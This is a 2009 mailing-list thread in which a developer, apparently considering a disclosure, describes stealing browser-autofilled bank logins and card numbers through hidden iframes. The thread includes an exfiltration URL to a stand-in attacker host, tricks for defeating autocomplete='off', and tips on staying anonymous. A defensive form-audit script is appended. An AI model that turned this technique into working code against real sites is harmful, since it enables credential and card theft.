Re: [Flashcoders] field value theft from flash banners and xss exploited forms, or outright malicious websites

2009-04-04 Thread Anthony Pace

<input type="text" name="email" autocomplete="off">

Just realized that you would have to replace the text field in the 
submission form if it has autocomplete="off", and, by redrawing the form, 
get autocomplete to work its magic and have your JS go through the 
testing process.



Anthony Pace wrote:
I was wondering if anyone here knew that this was possible and that, 
according to some sources, this is one of the reasons it 
wasn't implemented in Chrome:


I thought of this over two years ago; yet, never did anything with it 
(lazy... really lazy... plus I am not a criminal).


Flash banners that inject javascript, xss exploited forms, or outright 
malicious websites,  can place hidden iframes that load a bunch of 
bank login sites, and using javascript take advantage of auto complete 
form fill functions that require no user interaction, by reading the 
value of the input fields.  Once you have the user's card# or login 
and pass, you can dynamically create and load a script tag with the 
src set to 
http://your_free_geocities_site_with_false_hotmail_signin_info/trackinfo.php?bankid=blah&bankcard=blah&pass=blah 
and you have sent the data to a remote location.  If interaction is 
required for the auto complete function to work, get javascript to 
cycle through the ascii and cycle focus back and forth from the field 
till there is a value change.


The user would of course have signed up for a hotmail account, through a 
proxy, and used that hotmail account to set up a geocities account.  I 
know this wouldn't get everyone; yet, if you put it on a linkshare 
site, I am betting a hacker could just watch the collected info pour in.


I got it to work on my laptop for a locally hosted site (I won't 
tell with what browser and what parameters) and I am thinking about 
submitting a proof of concept; yet, I am wondering if anyone else 
wrote about this first, if I just missed it, and if there is someone 
else's proof of concept it would look like I was ripping off?

___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders




[Flashcoders] field value theft from flash banners and xss exploited forms, or outright malicious websites

2009-04-04 Thread Anthony Pace
I was wondering if anyone here knew that this was possible and that, 
according to some sources, this is one of the reasons it wasn't 
implemented in Chrome:


I thought of this over two years ago; yet, never did anything with it 
(lazy... really lazy... plus I am not a criminal).


Flash banners that inject javascript, xss exploited forms, or outright 
malicious websites,  can place hidden iframes that load a bunch of bank 
login sites, and using javascript take advantage of auto complete form 
fill functions that require no user interaction, by reading the value of 
the input fields.  Once you have the user's card# or login and pass, you 
can dynamically create and load a script tag with the src set to 
http://your_free_geocities_site_with_false_hotmail_signin_info/trackinfo.php?bankid=blah&bankcard=blah&pass=blah 
and you have sent the data to a remote location.  If interaction is 
required for the auto complete function to work, get javascript to cycle 
through the ascii and cycle focus back and forth from the field till 
there is a value change.


The user would of course have signed up for a hotmail account, through a 
proxy, and used that hotmail account to set up a geocities account.  I 
know this wouldn't get everyone; yet, if you put it on a linkshare site, 
I am betting a hacker could just watch the collected info pour in.


I got it to work on my laptop for a locally hosted site (I won't 
tell with what browser and what parameters) and I am thinking about 
submitting a proof of concept; yet, I am wondering if anyone else wrote 
about this first, if I just missed it, and if there is someone else's 
proof of concept it would look like I was ripping off?

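A defender-side check related to the thread above, as an added example that is not part of either post: it audits a site's own form markup and lists sensitive inputs that lack the autocomplete="off" attribute the reply mentions. The class name, the hint list and the sample markup are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Assumed heuristic (not from the thread): name fragments that mark a field as sensitive.
SENSITIVE_HINTS = ("pass", "card", "login", "email", "account")

class AutocompleteAudit(HTMLParser):
    """Collect sensitive <input> fields that the browser is allowed to autofill."""
    def __init__(self):
        super().__init__()
        self.form_off = False   # enclosing <form> carries autocomplete="off"
        self.findings = []      # names of fields left open to autofill

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").lower() for k, v in attrs}
        if tag == "form":
            self.form_off = a.get("autocomplete") == "off"
        elif tag == "input":
            self._check_input(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_off = False

    def _check_input(self, a):
        ftype = a.get("type", "text")
        if ftype in ("hidden", "submit", "button", "checkbox", "radio"):
            return
        name = a.get("name") or a.get("id") or ""
        sensitive = ftype == "password" or any(h in name for h in SENSITIVE_HINTS)
        setting = a.get("autocomplete")  # field-level value overrides the form's
        off = setting == "off" if setting is not None else self.form_off
        if sensitive and not off:
            self.findings.append(name or ftype)

def audit(html):
    parser = AutocompleteAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample markup; only the "email" input mirrors the line quoted in the thread.
SAMPLE = """
<form action="/login" method="post">
  <input type="text" name="email" autocomplete="off">
  <input type="text" name="bankcard">
  <input type="password" name="pass">
</form>
<form action="/search" autocomplete="off"><input type="text" name="login_hint"></form>
"""
```

Calling audit(SAMPLE) lists the two fields in the first form that carry no autocomplete setting. As the reply points out, a script that can redraw the form can drop the attribute, so this check covers markup hygiene only and not script injection.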